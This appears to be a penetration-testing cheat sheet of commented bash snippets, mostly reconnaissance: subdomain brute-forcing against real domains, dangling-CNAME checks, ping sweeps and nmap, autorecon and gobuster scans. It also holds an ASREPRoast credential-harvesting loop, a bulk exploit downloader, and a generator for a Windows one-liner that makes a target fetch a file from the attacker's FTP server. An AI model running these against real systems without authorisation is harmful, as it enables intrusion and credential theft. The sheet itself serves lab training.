
# Bash Voodoo

**#Figure out whether the last command worked or not**

```
# Print the exit status of the previous command (0 means it succeeded).
printf '%s\n' "$?"
```

**#Find out whether a given domain resolves**

```
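# The exit status of `host` says whether the name resolved. The message needs
# plain ASCII quotes: the curly quotes in the original are not shell quotes
# and were printed as part of the output.
if host target.com; then echo "It Resolves"; fi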
```

**#enumerate subdomains**

```
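# One candidate host per line of subdomains.txt. IFS= and -r keep each line
# verbatim (no backslash processing, no trimming) and the `|| [[ -n ... ]]`
# still handles a final line that has no trailing newline.
while IFS= read -r sub || [[ -n "$sub" ]]; do printf '%s.sbtuk.net\n' "$sub"; done < subdomains.txt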

#create subdomains.txt separately; the file contains:
admin
test
qa
dev
www
m
blog
```

**#Bruteforce subdomains | chmod 777 and run**

```
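#!/bin/bash
# Reads one label per line from subdomains.txt and prints the candidate names
# that resolve. `host` output is discarded so only the resolving names are
# printed; its exit status is what decides.
# Make the script executable with `chmod +x` — the 777 in the heading also
# makes it world-writable, which is never needed.
while IFS= read -r sub || [[ -n "$sub" ]]; do
    if host "$sub.yahoo.com" >/dev/null 2>&1; then
        echo "$sub.yahoo.com"
    fi
done < subdomains.txt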

```

**#Resolving CNAMES script  | cnames.sh**

```
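#!/bin/bash
# cnames.sh — reads one label per line on stdin (the subdomains.txt list
# above), looks up the CNAME of LABEL.DOMAIN and reports CNAME targets that
# no longer resolve. Such a dangling CNAME is a subdomain-takeover risk and
# should be removed from the zone.
#
# Usage: ./cnames.sh DOMAIN < subdomains.txt
#
# The shebang has to be the first line of the file; with a comment above it
# the script is run by whatever shell the caller happens to use.

domain=${1:?usage: $0 DOMAIN < subdomains.txt}

while IFS= read -r sub || [[ -n "$sub" ]]; do
    # `host -t CNAME` prints "X is an alias for Y." when a CNAME exists; $NF is Y.
    cname=$(host -t CNAME "$sub.$domain" | grep 'an alias' | awk '{print $NF}')
    if [[ -z "$cname" ]]; then
        continue
    fi
    if ! host "$cname" >/dev/null 2>&1; then
        echo "$cname did not resolve ($sub.$domain)"
    fi
done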
               
```

**#Concatenate the scripts to bruteforce yahoo.com**

```
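# Feed the list on stdin directly; cat adds nothing here.
./cnames.sh yahoo.com < subdomains.txt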
```

**#export IP variable**

```
# Keep the target address in an exported variable so child commands see it,
# and quote it wherever it is expanded.
export IP=192.168.101.57
nmap -sC -sV -oA quick "$IP"
```

**#Repeat the last command**

```
!-1   (relative history reference: the previous command; !1 would re-run history entry number 1)

OR

!!
```

**#Reverse-i search**

```
press Ctrl+R, then type dpkg (to search the history for a command containing dpkg)
```

**#History tricks**

```
# Do not save a command that repeats the previous history entry
HISTCONTROL=ignoredups
export HISTCONTROL

# Never save these: a repeat of the previous line (&) and a few noise commands
HISTIGNORE='&:ls:[bf]g:exit:history'
export HISTIGNORE
```

**#Assign a command to a variable**

```
# Capture a command's stdout in a variable, then print it.
user=$(whoami)
printf '%s\n' "$user"
```

**#URL generator script**

```
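#!/bin/bash
# Appends one URL per line to password.txt for every city/digit/digit
# combination (the file name is kept from the original; it holds URLs, not
# passwords, so rename it if that is confusing).
# The host was written as "example/com" — a typo for example.com that made
# "example" the host and "com" the first path segment.

# The output file is opened once for the whole loop instead of once per line.
for city in tokyo beijing newyork rome bangkok osaka; do
    for j in {0..9}; do
        for k in {0..9}; do
            printf 'http://example.com/%s/%s/%s\n' "$city" "$j" "$k"
        done
    done
done >> password.txt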
```

**#ping sweep script**

```
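#!/bin/bash
# Pings each address listed in ips.txt once.
# A single probe (ping -c 1, or host) can take about a second, so running 255
# of them one after another is slow. Each ping is put in the background with &
# so they run concurrently; `wait` then holds the script until all of them have
# finished, so no output arrives after the prompt has returned.
# (The second shebang that sat in the middle of the original is only a comment
# there and has been dropped.)

while IFS= read -r ip || [[ -n "$ip" ]]; do
    if [[ -z "$ip" ]]; then
        continue   # skip blank lines
    fi
    ping -c 1 "$ip" &
done < ips.txt
wait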
```

**#Print out all IPs in a given subnet**

```
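# Print 10.11.1.1 - 10.11.1.10, using seq for the range
for ip in $(seq 1 10); do echo "10.11.1.$ip"; done

#Variation with braces instead of seq to specify a range
for i in {0..255}; do echo "10.11.1.$i"; done

#Same output but using a while loop instead
# -lt stands for "less than", so this prints 1 - 9 and excludes 10.
# (These explanations were bare text in the original fence; run as a script
# they would have been executed as commands.)

#!/bin/bash
# while loop example
counter=1
while [[ "$counter" -lt 10 ]]; do
    echo "10.11.1.$counter"
    ((counter++))
done

#Create a list of hosts and redirect output to list.txt
#This command prints every possible address in the lab subnet
for i in {0..254}; do echo "10.11.1.$i"; done

#Redirecting output to a file (>> appends, so repeated runs grow the file)
for i in {1..10}; do echo "10.11.1.$i"; done >> list.txt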


```

**#wget a given target and use grep/bash to filter for subdomains**

```
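# Fetch the site's index page. Root is not needed to download a file; run it
# as your own user so index.html is not owned by root.
wget www.megacorpone.com

#use grep "href=" to extract all the lines in index.html that contain HTML links

grep 'href=' index.html

#beautify the output: keep links into the megacorpone domain, drop the www
#host itself and print what follows "http://"

grep 'href=' index.html | grep '\.megacorpone' | grep -v 'www\.megacorpone\.com' | awk -F 'http://' '{print $2}'

#using cut to only leave the host part

grep 'href=' index.html | grep '\.megacorpone' | grep -v 'www\.megacorpone\.com' | awk -F 'http://' '{print $2}' | cut -d '/' -f 1

#grep -o prints only the part of each line that matches the regular expression:
#'[^/]*\.megacorpone\.com' is a run of non-slash characters ending in
#.megacorpone.com, i.e. a host name in that domain

grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt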

```

**#DNS recon scripts**

```
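# Build the candidate list (>> appends to list.txt)
for i in {0..255}; do echo "10.11.1.$i"; done >> list.txt

# Then look each entry up; reading line by line avoids word-splitting the file

while IFS= read -r url || [[ -n "$url" ]]; do host "$url"; done < list.txt

#Parse the output, keeping only the addresses that resolved

while IFS= read -r url || [[ -n "$url" ]]; do host "$url"; done < list.txt | grep 'has address' | cut -d ' ' -f 4 | sort -u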

```

**#Using curl**

```
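#Similar to the wget technique but with curl (-s: no progress output)

curl -s https://www.cisco.com | grep 'href=' | cut -d'/' -f3 | grep 'cisco.com' | cut -d'"' -f1 | sort -u > test

#Beautify output: -o prints only the matching host names
curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u

#Resolve each host name; the list is read line by line from a process
#substitution instead of word-splitting a command substitution
while IFS= read -r url; do host "$url" | grep 'has address' | cut -d' ' -f4; done < <(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u)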

```

**#Running Autorecon against an entire subnet**

```
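#Use nmap sweep to check all ports; -oG writes greppable output

nmap -A --open 10.11.1.0/24 -oG Available_nmap-scan_10.11.1.1-254

#The greppable file has one "Host: <ip> ..." line per host plus "# Nmap"
#header/footer lines; drop those and keep field 2, the address (no cat needed)

awk '!/Nmap/ {print $2}' Available_nmap-scan_10.11.1.1-254 | sort -u

#Redirect output to another file  --> targets.txt

awk '!/Nmap/ {print $2}' Available_nmap-scan_10.11.1.1-254 | sort -u > targets.txt

autorecon targets.txt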

```

**#Workaround to use nmapAutomator against a subnet**

```
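# Read the target list into an array first: word-splitting $(cat ...) is
# fragile, and a `while read` loop would share its stdin with the backgrounded
# scans. `wait` keeps the shell alive until every background scan has finished.
# NOTE(review): every scan is started with the same `-o scan.txt`; confirm
# against nmapAutomator that concurrent runs do not clobber each other's output.
mapfile -t targets < targets.txt
for ip in "${targets[@]}"; do
    if [[ -z "$ip" ]]; then
        continue
    fi
    bash /usr/local/bin/nmapAutomator.sh --host "$ip" --type Full -o scan.txt &
done
wait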
```

**#Reverse lookup script**

```
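#!/bin/bash
# Reverse lookup for a /24: asks for the first three octets and runs
# `host -l` on each of .1 - .254.

echo "Please enter first 3 octets. e.g 192.168.1"
read -r subnet

# Refuse anything that is not three dotted numbers, so 254 lookups are not
# issued for garbage (an empty answer would query ".1", ".2", ...).
if [[ ! "$subnet" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
    printf 'Expected three octets such as 192.168.1, got "%s"\n' "$subnet" >&2
    exit 1
fi

for ((i = 1; i <= 254; i++)); do
    host -l "$subnet.$i"
done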
```

#### #check ASREPRoast for all domain users (without credentials)

```
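# One GetNPUsers.py run per line of users.txt. Reading line by line keeps each
# name intact; the `< /dev/null` stops the tool from consuming the list if it
# ever reads stdin, and the grep drops the Impacket banner line.
while IFS= read -r user || [[ -n "$user" ]]; do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 "domain/${user}" < /dev/null | grep -v Impacket; done < users.txt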
```

**#Bash customization |  edit /etc/bash.bashrc with root privileges**

```
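# Add the alias to /etc/bash.bashrc (system-wide, root needed to edit it) or to
# ~/.bashrc (current user only), e.g. with `nano /etc/bash.bashrc`.
# An alias is written NAME='...' with no spaces around the =. Single quotes keep
# $ip unexpanded until the alias is used, so it picks up the current value.
# gobuster does not need root for a wordlist scan, so sudo is dropped.
# NOTE(review): `-e u` is kept as written; confirm it against your gobuster
# version, where -e may be a bare flag that takes no argument.
alias gobustLin='gobuster dir -e u --url "http://$ip/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip'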

```

**#Search for a given exploit and download all matches**

```
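#!/bin/bash
#replace redcliff debian with keywords to search for
# searchsploit -w prints the exploit-db URL of each match; each one is fetched
# as its raw file into the current directory, named by its id.
# TLS verification is left on: --no-check-certificate would accept any
# certificate presented for the download.
searchsploit redcliff debian -w -t | grep http | cut -f 2 -d '|' |
while read -r e; do             # plain read trims the table padding around the URL
    url=${e/exploits/raw}       # .../exploits/ID -> .../raw/ID (first match, as sed did)
    exp_name=${e##*/}           # ID: the last "/"-separated field of the URL
    wget -q -O "$exp_name" -- "$url"
done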
```

**#FTP script to spawn a one-liner for downloading**

```
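#!/bin/bash
#Outputs a one liner to paste into a Windows host to create and run a ftp script to download a given file.

# Text coloring (printf '%b' expands the escape sequences, as echo -e did)
yellow='\033[1;33m'
nc='\033[0m'

echo
printf '%b%s\n' "$yellow" "This gives you a one liner to paste into a Windows host to create and run a ftp script."
echo

# change tun0 to your interface if needed
# awk takes the value after "inet " (stripping the older "addr:" prefix), which
# is sturdier than counting space-separated fields in ifconfig output.
ip=$(ifconfig tun0 2>/dev/null | awk '/inet / {sub(/^addr:/, "", $2); print $2; exit}')
if [[ -z "$ip" ]]; then
    printf 'Warning: no IPv4 address found on tun0; the one-liner will have an empty host.\n' >&2
fi
printf '%s\n' "Using IP address of tun0: $ip"
echo

printf '%s%b\n' "What port do you want the ftp server to run on? Hit enter for default of 21" "$nc"
read -r port
ftpport=${port:-21}   # default when the answer is empty
if [[ ! "$ftpport" =~ ^[0-9]+$ ]] || (( ftpport < 1 || ftpport > 65535 )); then
    printf 'Invalid port: %s\n' "$ftpport" >&2
    exit 1
fi

echo
printf '%b%s%b\n' "$yellow" "Enter the username: " "$nc"
read -r user
echo
printf '%b%s%b\n' "$yellow" "Enter the password: " "$nc"
read -rs pass   # -s: the password is not echoed to the terminal
echo

echo
printf '%b%s%b\n' "$yellow" "What file do you want the remote host to download?" "$nc"
read -r file

echo
printf '%b%s%b\n' "$yellow" "Paste the below to create a ftp script and run it:" "$nc"
echo
# Windows cmd syntax; note the credentials are embedded in clear text.
printf '%s\n' "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt"
echo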

```


